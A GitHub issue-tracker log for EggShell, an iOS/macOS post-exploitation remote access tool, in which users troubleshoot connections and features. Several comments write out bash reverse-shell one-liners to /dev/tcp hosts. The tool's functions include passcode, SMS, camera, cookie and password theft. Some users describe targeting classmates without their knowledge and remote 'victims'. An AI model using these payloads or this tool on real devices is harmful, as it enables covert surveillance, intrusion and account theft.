'something went wrong'
Error:
"Traceback (most recent call last):
  File "eggshell.py", line 108, in <module>
    main()
  File "eggshell.py", line 104, in main
    menu()
  File "eggshell.py", line 55, in menu
    choose[option]()
  File "eggshell.py", line 90, in menuStartMultiServer
    server.multiServer(sp[0],sp[1]);
  File "/Users/USERNAME/Documents/Folders/EggShell/src/server/server.py", li

[2017-03-20 14:42] cezarlacatus opened #41 "How to connect eggshell to a normal ios??"
Hello,I have understod that on a Mac you have just to run that bash script,but in ios exept writing aplications with that code how can i send the payload??

I own an ios 10 device non jailbroken....and i want to practise on it..
Thank you

[2017-03-20 16:56] neoneggplant commented on #41
it is for jailbroken only

[2017-03-20 16:56] #41 closed

[2017-03-23 00:47] neoneggplant commented on #40
what did you type right before the crash?

[2017-03-23 00:48] neoneggplant commented on #38
try the new release, let me know if you still have issues

[2017-03-23 00:48] #34 closed

[2017-03-23 00:57] #22 closed

[2017-03-23 00:58] #14 closed

[2017-03-23 00:58] #18 closed

[2017-03-23 06:21] yannip1234 commented on #40
Steps I did:
1. cd in to EggShell Folder.
2. 'python EggShell.py'
3. Created server
4. Entered command on another computer on LAN
5. The error shows when computer connects.

Sent from my iPhone

[2017-03-23 09:58] mineo210 commented on #38
Will do!

[2017-03-23 15:20] neoneggplant commented on #40
try the new release, a lot has changed, let me know if it fixed your issue, if not, I will help debug with you

[2017-03-28 16:38] ShellBear opened #42 "Problem while receive connection from client"
I'm using the last version but here it's my problem ervytime a client connect :
SET LHOST (Leave blank for 192.168.1.**)>
[*]  LHOST = 192.168.1.**
SET LPORT (Leave blank for 4444)>
[*]  LPORT = 4444
[*]  Listening on port 4444...
[*]  Connecting to 82.***.***.***
[*]  device unrecognized
bash: no job control in this shell

[*]  closing connection

[2017-03-28 16:45] ShellBear commented on #42
For info the client is a Macbook Pro 2008 running probably last osx version

[2017-03-28 17:51] neoneggplant commented on #42
what payload are you using? it looks like a reverse bash shell and not an eggshell payload

[2017-03-28 18:35] ShellBear commented on #42
I used this script : while true;do bash -i >& /dev/tcp/90.39.132.99/4444 0>&1;sleep 5;done

[2017-03-28 18:36] ShellBear commented on #42
Is it the problem ?

[2017-03-28 18:37] ShellBear commented on #42
I configured it to works over lan with my external ip

[2017-03-28 20:17] neoneggplant commented on #42
you need to use the payload creation option in eggshell

[2017-03-28 20:17] neoneggplant commented on #42
it will look something like this
bash &> /dev/tcp/(external IP)/4444 0>&1

[2017-03-29 16:53] ShellBear commented on #42
ok thank you. Problem resolved but now i have this error. I put you an example.

test@test's MacBook> ls
total 18
4983        384   2017-03-29 16:51:18  test          .bash_history
7           256   2015-11-28 22:53:54  test          .CFUserTextEncoding
102         448   2015-11-30 22:47:43  test          .cups
340         448   2016-04-18 18:40:19  test          .dropbox
14340       420   2017-03

[2017-03-30 07:24] cezarlacatus opened #43 "Android soupport"
As long as this shell works only on a jailbroaken ios you can make a same shell for android??There's no shell for android so cool like this...

Yhx and sorry for my englesh

[2017-03-30 12:18] mineo210 commented on #43
does android have bash?? There's a lot of rats for android try that.

[2017-03-30 22:23] neoneggplant commented on #43
currently there is no binary payload for android, however, this could be done, I plan to do linux first before androidd

[2017-03-31 04:42] cezarlacatus commented on #43
Cool please do it.You have nice features on iphones.I am so sad because this only works on a jailbroaken device _-_ apple sucks

[2017-03-31 17:54] #43 closed

[2017-03-31 17:56] #40 closed

[2017-03-31 17:57] neoneggplant commented on #38
still having problems?

[2017-04-03 22:31] mineo210 commented on #38
haven't sadly gotten the chance to test it on my most glitches victim since he hasn't been online when I listen for connections and I've been moving to a new apartment so wi-fi has been a problem.. Otherwise every other victim is working.

[2017-04-04 01:52] neoneggplant commented on #38
ok, when you say victim, I assume you mean your own target victim machines

[2017-04-04 06:26] mineo210 commented on #38
Some of my classmates and they know it.
I've been doing before without a guy knowing but it was a request from some friend when I first started using eggshell otherwise I'm not using it for illegal activities.

[2017-04-04 17:25] neoneggplant commented on #38
ok, because I can only help if you are using with user consent or on computers you own

[2017-04-06 01:00] arechiksn0w commented on #40
i try new update still have error Trackback(most resent call last)
File "eggshell.py". line 7. in <module>
import base64

[2017-04-06 02:54] neoneggplant commented on #40
what is the full error? @arechiksn0w

[2017-04-06 19:46] arechiksn0w commented on #40
can help me to complate eggshell.py on ios terminal?

[2017-04-07 19:09] #38 closed

[2017-04-09 18:11] MircoCagni opened #44 "Failed"
I have try to use this exploit on a VM with Mac OS X Sierra, but the responde is wrong error

[2017-04-09 18:17] neoneggplant commented on #44
can you be more specific?

[2017-04-09 18:46] MircoCagni commented on #44
Yes, sorry, i have create a payload with my Parrot OS using eggshell "bash &> /dev/tcp/192.168.0.10/4444 0>&1 " and i have start server. But When i go to write my payload in OS X terminal the response is this:

"
[*]  Listening on port 4444
[*]  Connecting to 192.168.0.11
[*]  Detected OS X
[*]  Sending Payload
[*]  Waiting For Connection. . .
[*]  Type "help" for commands
went wrong> "

and if i

[2017-04-09 19:00] neoneggplant commented on #44
ok, I will look into this

[2017-04-09 19:19] ShellBear commented on #44
Looks like the same error i got with ls

[2017-04-09 20:40] neoneggplant commented on #44
this is on startup though, its not receiving the computer name

[2017-04-09 21:49] MircoCagni commented on #44
How can I solve this problem

[2017-04-09 22:27] neoneggplant commented on #44
I don't know what is causing it yet

[2017-04-09 22:27] neoneggplant commented on #44
I will look into it

[2017-04-10 10:12] mineo210 opened #45 "There's a password recovery tool called LaZagne"
If you feel like adding this do you think it's possible to make a module out of this?

https://github.com/AlessandroZ/LaZagne

[2017-04-10 18:31] neoneggplant commented on #45
hmm very interesting, definitely going to look into it!

[2017-04-10 18:31] #45 closed

[2017-04-13 04:39] neoneggplant commented on #45
@mineo210 I created a lazagne command module, it seems firefox is the only thing it supports

[2017-04-13 08:24] mineo210 commented on #45
Wow awesome, no problem tho!

[2017-04-13 08:26] mineo210 commented on #45
Sadly tho it supports a lot more on Windows.

[2017-04-14 20:02] mayed505 opened #46 "Hello how do i use this correctly?"
I ran the eggsheel and press 3 and did the config
on my ios 9.1 ipad i went to 192.168.0.116 that the eggshell payload is listening on
but the moment i join that ip on the ipad this appears for 2 seconds and resets the console
https://gyazo.com/6df06c1c6aeef12425950adf3d70e625

[2017-04-14 20:25] ShellBear commented on #46
That normal, you did it wrong. When entering 3 you get a payload which you need to execute in a terminal such as mobile terminal on Cydia, after that you just write the payload in the terminal which looks like :
Bash &> /dev/tcp/IP/4444 0>&1

And you will have a session. What you did is to open the ip of the listener directly from safari but unless you have a safari exploit which allow you to exec

[2017-04-14 20:35] mayed505 commented on #46
I thought I was able to do it without jailbroken Device to use the terminal.
Would it be possible to do safari exploit on iOS 9 and below?

[2017-04-14 20:42] ShellBear commented on #46
The safari exploit which used Lucas is a 9.3.3 Safari Exploit, so I'm not sure but there is a chance that it can be compatible.

[2017-04-14 20:43] mayed505 commented on #46
@ShellBear I am on iOS 9.3.3 another device I just need to try it without jb

[2017-04-14 20:53] ShellBear commented on #46
Yes. But maybe wait until Lucas answer you. I will probably help you doing that

[2017-04-14 20:56] mayed505 commented on #46
Ok thanks

[2017-04-15 05:44] merkjinx commented on #35
i know that pupy has a python module for keylogging, i've tested it and it works fine just needs a little bit of modification to get it working here.

[2017-04-15 06:58] ShellBear commented on #35
Personally i tested this keylogger which work fine, but it's written in Switch which means that you need to upload the binary to the client.

[2017-04-16 09:21] mineo210 commented on #45
@neoneggplant any update on the module since the last time you tested it? Does it work with chrome yet? just overall info :)

[2017-04-16 16:54] mayed505 commented on #46
@neoneggplant bump

[2017-04-16 19:20] mayed505 opened #47 "when running on ios jailbroken"
i installed python on my ios using mterminal on 10.1.1
but whenever i do python eggshell.py it says i should do easy_install pycrypto but when i do that
it still exists that error
does anyone have any deb file for pycrypto? to run the py?

[2017-04-16 21:55] mineo210 commented on #47
try installing pycrypto inside of cydia.

[2017-04-17 03:35] mayed505 commented on #47
@mineo210 pls repo?

[2017-04-17 16:43] neoneggplant commented on #47
it's not officially supported on 64 bit iOS devices. try using from another device with python on it

[2017-04-17 16:43] #47 closed

[2017-04-17 16:45] neoneggplant commented on #46
this tool is for post exploitation only. It will not exploit safari for you, that was a separate project I did

[2017-04-17 16:47] neoneggplant commented on #45
I have it working for the single firefox module, but for more mac modules, you would need to ask the original developer of lazagne, I don't think it's worth including just yet

[2017-04-17 18:30] mayed505 commented on #46
@neoneggplant can i have the safari one?
plsss

[2017-04-18 21:10] #46 closed

[2017-04-19 10:25] theHackPot opened #48 "getpasscode command error "Input strings must be a multiple of 16 in length""
## Issue
getpasscode command fails to return passcode

### Expected behaviour
Return Passcode

### Actual behaviour
Returns error "Input strings must be a multiple of 16 in length"

### Steps to reproduce
1. Set device passcode to 4 digits e.g. 0000
2. Execute payload on target machine & connect back
3. run getpasscode command

<img width="547" alt="screen shot 2017-04-19 at 11 16 24" src="https:/

[2017-04-19 19:33] neoneggplant commented on #48
I will look into this, what ios version are you on?

[2017-04-19 19:39] theHackPot commented on #48
iOS 9.0.2

On 19 Apr 2017 8:33 p.m., "Lucas Jackson" <notifications@github.com> wrote:

[2017-04-20 17:08] mayed505 opened #49 "Script freezes on certain commands on me!"
https://gyazo.com/6dce9d5e1cb6171ed03be197da55dd38
when using this command the session freezes and doesnt even take a picture on IOS
this problems applies to:
frontcam
backcam
getsms
getcontacts
getnotes

iphone 7 , 10.1.1
i tries also on ipad mini 1 ios 9.0.(something) still the same issue

[2017-04-23 10:59] mayed505 commented on #48
same im having the same issue it doesnt installpro

[2017-04-26 12:32] Loveforkeeps commented on #44
I try to use it to  iPhone5(iOS7.1.2) and Mac OS X Sierra , went wrong also

[code]

[2017-04-26 12:55] ShellBear commented on #44
I have exactly the same issue

[2017-04-26 17:19] angelaricas opened #50 "Is possible use this code with public ip?"
is possible use with public ip?

[2017-04-26 17:33] ShellBear commented on #50
Yes, but you need to forward ports (ex : 4444)  on your routeur

[2017-04-26 17:40] angelaricas commented on #50
Where I have to put the ip publish and where I put the local ip to listen,
one more question, can I hide the path in a link? I guess, but would have
to change some other parameter for public?

Thankss!

[2017-04-26 18:09] ShellBear commented on #50
You just need to use your public ip in eggshell, the port forward will automatically send you data from public ip to your computer on lan. This is not an url, this is a command which you need to use in terminal or insert it into an executable.

[2017-04-26 18:22] angelaricas commented on #50
how do i insert it into a executable for ios? is not possible really?

[2017-04-27 07:56] knkrth opened #51 "Update support 10.x.x"
Hi, It is possible to update this repo to support 10.x.x  `CVE-2017-2464` using https://www.exploit-db.com/exploits/41931/ ?

[2017-04-29 04:11] #50 closed

[2017-04-29 04:14] neoneggplant commented on #51
It may be possible, writing an exploit for this memory corruption bug is beyond me, so I am not able to do this currently

[2017-04-29 04:14] #51 closed

[2017-05-12 19:48] etispeza commented on #39
I am getting the same error also!
How am I supposed to execute that in bash in a non-jailbroken device?! I thought it was for both jailbroken and non-jailbroken this exploit!
Some more explanation is needed i suppose.

Thanks

[2017-05-14 21:13] neoneggplant commented on #39
no, this is not an exploitation tool, it is a post exploitation tool

[2017-05-14 21:14] neoneggplant commented on #39
if you saw the video of the exploit from safari, it was demonstrating the exploit working with eggshell

[2017-05-15 07:41] etispeza commented on #39
@neoneggplant  I see...but you know where to find this exploit? I think it can be used for icloud locked idevices, that's what I'm working on!

[2017-05-16 03:28] neoneggplant commented on #39
luca todesco's 9.3.3 jbme site

[2017-05-16 17:41] demipixel opened #52 "Stuck on "Waiting for Connection...""
[code]

User appears to be an admin. Any idea how I might debug this?

[2017-05-18 21:32] neoneggplant commented on #52
will definitely look into this!

[2017-07-08 00:02] no-name97 commented on #42
When I create the payload where can I find it to put to my iPhone that I want to test one it .
It gave me this directory
&>/dev/tcp/(local host ):4444 0>&1
But there is no like this directory just /dev/.
So where can I find the payload to start the listener ?

[2017-07-09 10:42] naderlavasani opened #53 "microphone recording"
Hi Lucas,

in the project you store the streaming audio (microphone) into the file "/tmp/.avatmp". the server download the file and convert it to .aac file.in the server side, how did file converted? file encrypted or compressed? or Can i use .aac instead of ".avatmp" ? i mean how can i convert tmp file to audible format.

[2017-07-10 13:56] #53 closed

[2017-07-10 20:28] neoneggplant commented on #42
that is the payload, its that one line of bash @no-name97

[2017-07-25 09:40] Virgula0 opened #54 "Backdoor on iOS?"
is it only works on iOS jailbroken if I have understand correctly... Bu if I try to code a backdoor for iOS with Xcode with system(""), there is a warning that warn me that system is deprecated from iOS 8...
It works the same also if there is this warn?

[2017-07-25 22:30] neoneggplant commented on #54
lookup nstask for getting rid of the deprecation warning -> https://stackoverflow.com/questions/17976289/executing-shell-commands-with-nstask-objective-c-cocoa
As for the no-ip compatibility, what do you mean exactly? You can port forward your router that your server is running on and have an ip from outside the network connect to your router ip on a port, then forward that connection to an intern

[2017-07-26 09:33] Virgula0 commented on #54
Yah it's right, but you could have a router that doesn't supports static ip and with no-ip you can resolve this problem. Try it...it works also in linux. To implement it in this software in my opnion you have only to remove the checking about integer value when you insert your ip....
About your link, that code with NStask works only on Mac OS or also for cocoa apps on iOS?

And above all your work

[2017-07-27 16:58] neoneggplant commented on #54
eggshell does have dns support in replace of ip addresses, also, getfacebook only works with safari, it looks like your using chrome

[2017-07-27 17:02] Virgula0 commented on #54
I have use getfacebook for get cookies of a session of my Facebook on safari, then I'm trying to hijack my account by using edit cookie extension on chrome..... But I don't understand where insert c_user and xs cookies because there aren't when I visit Facebook.com like the picture upside.

[2017-07-27 17:05] neoneggplant commented on #54
oh, you create a new cookie field, click the "+" button and insert the new key values

[2017-07-27 17:10] Virgula0 commented on #54
Yeah I have already set as you have said but it seems doesn't work .... I don't understand ...

<img width="1440" alt="schermata 2017-07-27 alle 19 07 01" src="https://user-images.githubusercontent.com/16546435/28682975-2c65239a-72ff-11e7-8cad-f26d7f862ea6.png">

[2017-07-28 14:31] Virgula0 commented on #54
It not seems if I try to insert a dns using no-ip eggshell crashes...

<img width="1147" alt="schermata 2017-07-28 alle 16 30 15" src="https://user-images.githubusercontent.com/16546435/28721939-310ebe0c-73b2-11e7-9f6f-0f3bff979e4d.png">

[2017-07-31 13:35] Virgula0 commented on #54
And what about also to add a key logger command?

[2017-08-13 11:34] biterpreter opened #55 "one-liner fails with zsh, csh"
csh
[code]
zsh
[code]

This is easily solved by wrapping the payload with
[code]

[2017-08-14 20:16] MariusSolaat opened #56 "Isight Light?"
Any way to have this turned off?

[2017-08-14 23:12] neoneggplant commented on #56
no unfortunately that is impossible

[2017-08-14 23:12] #56 closed

[2017-08-14 23:13] #55 closed

[2017-08-15 14:47] N1kRolexx commented on #52
I also have this problem. In LAN it was working good, but now I'm trying to use on the same computer but over ddns + port fwd and it's not working.
Any changes or ways to solve the problem?

[2017-08-19 11:16] N1kRolexx commented on #52
Seems like i have found the solution
Do you use dynamic dns?

[2017-08-21 10:52] Virgula0 commented on #52
Do you use dynamic dns?

With the integration of no-ip out of network it doesn't work for me... any solution?

[2017-08-22 10:23] N1kRolexx commented on #52
No-ip ddns works for me.
When I start a server I type my ddns adress, not a local ip.
If i put my local IP the server stucks on "Waiting for connection"
That's pretty much everything what i noticed regarding this issue :)

[2017-08-22 11:23] Virgula0 commented on #52
I don't understand why it doesn't works out of local... the port forwarding successfully works but in local with no-ip it works.... out of my network nope....

[2017-08-22 15:25] N1kRolexx commented on #52
When you start a server in EggShell do you type your ddns name or local ip?

[2017-08-24 04:33] salamsalamhavji opened #57 "Connect via iOS App"
Hi,
This is unique and best Payload. So thanks for you Lucas. But System is a function for MacOS. How to run "bash &> /dev/tcp/...." in iOS App?

Thanks for Help

[2017-08-24 07:21] cemates commented on #57
iOS 9.3.3 and under are vulnerable just by simply clicking a link in Safari. so if you're running an upgraded version of iOS, unfortunately, you shall not do it.

[2017-08-24 15:05] neoneggplant commented on #57
if you are jailbroken you can call NSTask and it will run the payload ,it is not specific to 9.3.3
https://stackoverflow.com/questions/17976289/executing-shell-commands-with-nstask-objective-c-cocoa

[2017-08-24 16:18] yitaolin opened #58 "why Unable to get computer name"
EggShell> 3
SET LHOST (Leave blank for 192.168.31.161)>
[*]  LHOST = 192.168.31.161
SET LPORT (Leave blank for 4444)>
[*]  LPORT = 4444
bash &> /dev/tcp/192.168.31.161/4444 0>&1
EggShell> Start Server? (Y/n):
EggShell> Multi Server? (y/N):
[*]  Listening on port 4444...
[*]  Connecting to 192.168.31.161
[*]  Detected OSX
[*]  Sending Payload
[*]  Waiting For Connection...
Something went wrong
[*]

[2017-08-26 09:18] salamsalamhavji commented on #57
Tnx man:)

[2017-08-26 09:52] salamsalamhavji opened #59 "Get Files not responding"
Hi,
when i will exec (download, frontcam, backcam , ...) command, connenction is hang up and i can not exec any command
![8-26-2017 2-20-39 pm](https://user-images.githubusercontent.com/31301048/29740351-d968866e-8a69-11e7-8010-280d969a7064.jpg)

tnx for answers.

[2017-08-26 13:21] songhongbao commented on #58
I get the same error msg.

[2017-08-29 09:26] 30wish2015 commented on #59
i get the same msg.    it seems that client sends the wrong data to server.

[2017-08-31 10:35] Grox-Ni commented on #59
same for OS X when exec code like 'picture, ls'

[2017-08-31 15:44] neoneggplant commented on #59
these issues will be fixed in eggshell 3

[2017-09-03 03:42] salamsalamhavji commented on #59
that's Gooooooood.
we will wait for eggshell 3... .
Tnx man

[2017-09-04 08:54] steveatco opened #60 "High level ports"
Hi,
Great tool!

I wanted to simulate attack coming from Internet and have a VPN provider where I can forward high  port numbers to my Kali machine (i.e 60444), I think there is an issue in that you cannot create a server on a port with 5 charterers long? tried using higher port with local network Kali VM as well and is the same issue.

Also for MetaSploit handler you can use advanced options to h

[2017-09-05 11:33] uthman3a commented on #60
i have a vps how to use vps ip to forward it to my local kali in virtual machine ...

[2017-09-05 11:35] uthman3a opened #61 "how to use my vps ip"
i want a way to fix an ip and i have a vps ip is there a way to forward vps ip to my local kali in virtual machine ?

[2017-09-12 01:56] hakancelik commented on #57
Hi,
With Which techniques we can infect the payload? To embed in a IOS app is okey but than it is a bit hard to install this app our victims phone which victim far away from us. Is it work with sms? Or you can mention any other techniques? Than we can have access victim's phone who lives far away:)

Thanks Lucas.

[2017-09-12 14:35] Coriou commented on #61
Several ways to do that :

1. Run the EggShell server straight from your VPS
2. Get a domain name & configure an A DNS record pointing back to your dynamic IP (and update it when it changes)
3. Use a service that does all the DNS setting up & allows you to easily update the IP when it changes, like [noip.com](https://www.noip.com)

[2017-09-20 15:21] Scriptkidy opened #62 "PLS halp me remove it thx"
how do you remove it
i put it on my computer for testing and now nothing can connect on port 4444 ;-;
pls tell me how 2 remove so i can get into my friends computer and open pornhub 19384 times

thx
-scriptkidy

[2017-09-20 16:48] Scriptkidy commented on #62
nvm i removed the crontab (`crontab -r`)
all good now 😆

[2017-09-20 16:48] #62 closed

[2017-09-21 18:36] neoneggplant commented on #62
I do not condone you using it for this purpose. I denounce this behavior to the fullest

[2017-09-22 11:18] luke-shu opened #63 "Why my console stuck in Listening on port 4444..."
my console stuck in Listening on port 4444... and did not go further

[2017-09-22 21:34] SPARTANHJS commented on #63
Same here ! 😵

[2017-09-23 13:43] alvaroillanes opened #64 "No such file or directory: '/src/resources/esplinux"
Helpme please...

binaryFile = open("/src/resources/esplinux", "rb")
IOError: [Errno 2] No such file or directory: '/src/resources/esplinux'

[2017-09-26 11:56] Scriptkidy commented on #64
change`binaryFile = open("/src/resources/esplinux", "rb")`
to `binaryFile = open("src/resources/esplinux", "rb")`
hope this helped!

[2017-09-26 12:02] Scriptkidy opened #65 "Xcode will not compile"
this is a new install of eggshell with no edits or clients, any help would be appreciated.
![screen shot 2017-09-26 at 7 57 30 am](https://user-images.githubusercontent.com/26258618/30859266-ed707330-a290-11e7-9efd-69a45623f784.jpg)

[2017-09-26 19:26] alvaroillanes opened #66 "device unrecognized"
`EggShell> 3
SET LHOST (Leave blank for 192.168.0....)>
[*]  LHOST = 192.168.0....
SET LPORT (Leave blank for 4444)>
[*]  LPORT = 4444
bash &> /dev/tcp/192.168..../4444 0>&1
EggShell> Start Server? (Y/n):
EggShell> Multi Server? (y/N):
[*]  Listening on port 4444...
[*]  Connecting to 192.168.0....
[*]  device unrecognized
x86_64

[*]  Press Enter To Continue`

![error](https://user-images.githubu

[2017-09-26 19:28] #64 closed

[2017-09-27 14:55] #66 closed

[2017-09-27 15:00] alvaroillanes opened #67 "device unrecognized"
follow all the steps and the cell phone does not recognize me ...

EggShell> 3
SET LHOST (Leave blank for 192.168.0....)>
[] LHOST = 192.168.0....
SET LPORT (Leave blank for 4444)>
[] LPORT = 4444
bash &> /dev/tcp/192.168..../4444 0>&1
EggShell> Start Server? (Y/n):
EggShell> Multi Server? (y/N):
[] Listening on port 4444...
[] Connecting to 192.168.0....
[*] device unrecognized
x86_64

[*] Press

[2017-10-03 10:53] salamsalamhavji commented on #59
what happen in these issue? maybe i can solve it

[2017-10-21 13:47] drdrth commented on #63
guys did anybody found a solution for this issue ?

[2017-10-28 09:37] #57 closed

[2017-10-28 09:39] salamsalamhavji commented on #59
hey man, when solve this problem?

[2017-10-28 10:05] Virgula0 commented on #59
Bug appears also on Mac when eggshell tries to escalate privileges with root password...

[2017-11-25 13:33] valentino00776 opened #68 "screenshot not working after persistence"
screenshot not working after persistence but works when payload entered in terminal

Anyone found way of fixing ??
Much appreciated

[2017-11-26 12:47] paskal06 commented on #67
What device are you trying to connect?

[2017-12-03 10:25] salamsalamhavji opened #69 "Send and receive file problem"
**Each command that send and receive file do not work.
such as getsms or frontcam and others...**

[2017-12-11 21:38] Codyjay1 opened #70 "Help Locating Files"
So I've been using EggShell, I've done tests by starting a server doing it on myself, and works perfectly. Now I want to target someone on a different wifi but sending them a payload. When I create the payload I don't know where the file saves to, to send to the victim.

I use a Mac so if anyone has any idea to what the file will be called or where abouts it would be please help me out.

[2017-12-31 00:35] Blaze2658 opened #71 "How to send/execute payload?"
Stupid question, but how is the payload sent and executed on the targets device? From all of the tutorials iv'e seen, none seem to answer this in detail. This is on iOS by the way. Thanks.

[2017-12-31 12:43] paskalev2001 commented on #71
If you want to use it on IOS, the victim's phone must be jailbroken and you need to install console that will allow you to type in "**_bash &> /dev/tcp/0.0.0.0/4444 0>&1_**". As for MacOS you should just open the console and type in the same command.

[2017-12-31 12:47] paskalev2001 commented on #63
did you type in the "**_bash &> /dev/tcp/0.0.0.0/4444 0>&1_**" into the victim's device?

[2017-12-31 17:11] Blaze2658 commented on #71
That would make a lot of sense. Thanks.

[2017-12-31 17:11] #71 closed

[2017-12-31 19:20] mineo210 opened #72 "eggshell repo in cydia?"
I remember that you had your repo here for Cydia, finally got my hands on a iPhone 5 bcuz it's 32bit and have no luck of finding the repo.

[2018-01-02 18:16] neoneggplant commented on #72
I am releasing version 3 hopefully this week, supports 64 bit as well :)

[2018-01-03 21:18] mineo210 commented on #72
@neoneggplant great! I've been trying out the latest version of version 3 and so far I've found some problems. somehow it doesn't want to work when executing the bash payload on the phone for me.

[code]
some other small problems that maybe are small mistakes is that persistence doesn't seem to work on macOS and the new teensy payload makes this error:

[code]

[2018-01-05 13:05] kirkpe opened #73 "unknown command "easy_install""
i cant intsall pycrypto :/

[2018-01-05 17:47] neoneggplant commented on #72
@mineo210 what ios device are you using, I may just need to add your device architecture

[2018-01-05 17:53] neoneggplant commented on #72
@mineo210 I appreciate you finding these bugs! I just pushed a fix for teensy payload creation

[2018-01-05 19:17] mineo210 commented on #72
@neoneggplant Great and I'm running on IOS 9.1 on a iPhone 5 32bit.

[2018-01-05 19:23] mineo210 commented on #72
@neoneggplant And this is happening for me:
![screen shot 2018-01-05 at 20 20 33](https://user-images.githubusercontent.com/24258597/34624578-2083d04a-f256-11e7-8a76-ea0dcfe229fd.png)

running OS X El Capitan version 10.11.5

[2018-01-05 19:49] neoneggplant commented on #72
hmm, I'm trying to figure out what file it cannot find

[2018-01-05 19:50] neoneggplant commented on #72
do you have server.crt and server.key being generated in your ".keys" folder in the root directory of eggshell3?

[2018-01-05 22:11] mineo210 commented on #72
@neoneggplant Sorry for late respond.
![screen shot 2018-01-05 at 23 11 04](https://user-images.githubusercontent.com/24258597/34630760-c39cc72a-f26d-11e7-9bf2-6fbd775181fb.png)

[2018-01-05 22:26] neoneggplant commented on #72
ok, I found it is an ssl error, what version of ssl are you using? run 'openssl version'

[2018-01-05 23:06] mineo210 commented on #72
@neoneggplant OpenSSL 1.1.1-dev and Python 2.7.14

[2018-01-07 02:04] neoneggplant commented on #72
did the latest commit fix the iOS issue? I don't have an iPhone 5 to test on

[2018-01-07 12:35] mineo210 commented on #72
@neoneggplant same error, might be bcuz of the OpenSSL error.

[2018-01-07 19:01] Rangoow opened #74 "unexpectable issue : "Something went wrong 'NoneType' object has no attribute 'rstrip' ""
Hello, I'm discovering eggshell which is working pretty well but sometimes when i use different commands like 'cd' or 'ls' more specialy I get this message :
 " Something went wrong
'NoneType' object has no attribute 'rstrip' ".
 And then i can't continue exploring directories on my second laptop for example.
Could you help me please, if you need something else to solve it, tell me !

Thank you in

[2018-01-08 05:14] neoneggplant commented on #72
what OS are you on?

[2018-01-08 06:28] neoneggplant commented on #73
fixed in eggshell3 branch https://github.com/neoneggplant/EggShell/tree/eggshell3

[2018-01-08 06:29] #73 closed

[2018-01-08 06:31] neoneggplant commented on #72
also I have some good news! I got eggshell working on my iphone 6, repo coming soon :)
<img width="452" alt="screen shot 2018-01-08 at 1 25 12 am" src="https://user-images.githubusercontent.com/12518571/34660862-93917312-f413-11e7-843e-82dfb88b8cdf.png">
<img width="332" alt="screen shot 2018-01-08 at 1 26 39 am" src="https://user-images.githubusercontent.com/12518571/34660866-974953e4-f413-11e7-8

[2018-01-08 12:54] mineo210 commented on #72
@neoneggplant great! I'm running OS X El Capitan version 10.11.5

[2018-01-08 16:23] neoneggplant commented on #72
where did you install openssl from? the default is lower than 1.1.1, just asking so I can try to replicate the issue

[2018-01-09 02:58] mineo210 commented on #72
@neoneggplant installed it from here some days ago because I was having some problems with the other version https://github.com/openssl/openssl

[2018-01-09 04:58] neoneggplant commented on #72
see if you can restore back to the original. Also, I just setup eggshell for iOS on a new repo: http://lucasjackson.io/repo
let me know if this works for you :)

[2018-01-09 04:58] #72 closed

[2018-01-10 15:15] neoneggplant commented on #58
try with the new release of eggshell 3, it should address this issue

[2018-01-10 15:15] #58 closed

[2018-01-10 15:15] neoneggplant commented on #48
eggshell 3 should fix these issues

[2018-01-10 15:15] #48 closed

[2018-01-10 15:16] #16 closed

[2018-01-10 15:16] #33 closed

[2018-01-10 15:16] #20 closed

[2018-01-10 15:16] #63 closed

[2018-01-10 15:17] neoneggplant commented on #49
try on the new eggshell 3 release, it should fix this

[2018-01-10 15:17] #49 closed

[2018-01-10 16:58] neoneggplant commented on #74
hm, see if the new release fixes that issue

[2018-01-10 16:59] neoneggplant commented on #69
see if the new release fixes these issues

[2018-01-10 16:59] #69 closed

[2018-01-11 09:26] mineo210 commented on #72
@neoneggplant awesome! managed to restore to openssl 1.0.2. took longer than expected. Used to have a 64bit phone but the 32bit one is my main one rn :(

[2018-01-11 20:20] nerdtron123 commented on #65
just use eggshell.py, you don’t have to compile anything

[2018-01-11 20:21] nerdtron123 commented on #61
Just saying, putting it through your VPS won’t make you uncatchable, just means anyone won’t be able to track you without getting your host or the police involved

[2018-01-11 20:22] nerdtron123 commented on #61
Also, this isn’t built to leave no traces so you miight not want to use this for nefarious reasons

[2018-01-11 20:24] nerdtron123 commented on #54
There’s already a keylogger command

[2018-01-11 21:19] neoneggplant commented on #65
should be fixed in 3.0 release

[2018-01-11 21:19] #65 closed

[2018-01-11 21:20] #61 closed

[2018-01-16 10:22] Jacob-Mango opened #75 "Stuck on "Establishing Secure Connection" for iOS."
I am having a problem where it just reports "Establishing Secure Connection" in the Command Prompt. No certificate or any file is created in the .Keys folder. Using option 3 (Create Payload) doesn't really show any information about the connection.

Using Windows Subsystem (Ubuntu) it just gets stuck on "Listening on port 4444" but it manages to create the certificates and other 2 files.

I am usi

[2018-01-16 17:19] Rangoow commented on #74
I tried it today, but with the new release it stuck on " EStablishing a secure connection", and with the old one problem is still here. Hope we can find a solution !

[2018-01-16 20:57] neoneggplant commented on #75
seems to be your internet not connecting outside of the subsystem

[2018-01-16 20:58] neoneggplant commented on #74
what devices are you using?

[2018-01-18 00:57] neoneggplant commented on #68
is this still happening for you with the latest release?

[2018-01-19 13:35] Rangoow commented on #74
I'm using an ASUS UX303ub, running kali linux 2017.3 in dual boot with windows 10

[2018-01-20 19:05] rt004984 commented on #72
Hello,

I'm getting an error " establishing secure connection " Please help me to solve this problem Thank you

[2018-01-22 13:14] computer00776 commented on #68
with new version its stuck on Establishing secure connection
All ports are open as old version connects no problem
Using multi connection on new version no connection at all shows

Thanks Buddy

[2018-01-22 21:00] kaifanos commented on #75
Same issue, I have all ports open to connecting outside.

[2018-01-23 12:18] bigfood0x23 opened #76 "how disable ssl?"
Hello!
After updating the eggshell and adding work through ssl - it stopped working. When you start paypload, it turns off with an error -
the openssl library was not found.
Where can I find the previous version of eggshell that worked without ssl? or you can tell how to make the server and payload work
without ssl

[2018-01-23 15:45] kaifanos commented on #76
to get back in a previous version, in the terminal just go in to your EggShell folder and execute this command `git checkout dd9f71eb3cc59ebb2d0e3bf27fa6affa0f47b993` the last number means the older version

[2018-01-23 21:55] neoneggplant commented on #76
sounds like you need to install openssl, what device are you running it on? @bigfood0x23

[2018-01-27 04:20] #59 closed

[2018-01-27 13:35] valentino00776 opened #77 "Stuck on Establishing Secure connection on Mac"
Hey Guys
Excited to try the new version but every-time i try it gets stuck on Establishing Secure connection.
I have tried on local ip and external. My ports are open as the older version works.
Any ideas ?

[2018-01-27 15:58] neoneggplant commented on #77
what device are you using for the server and client?

[2018-01-27 16:42] computer00776 commented on #77
Thanks for quick response
using on kali payload on imac

[2018-01-27 17:57] neoneggplant commented on #77
are you not using the payload created by eggshell?

[2018-01-27 18:10] computer00776 commented on #77
i sure am
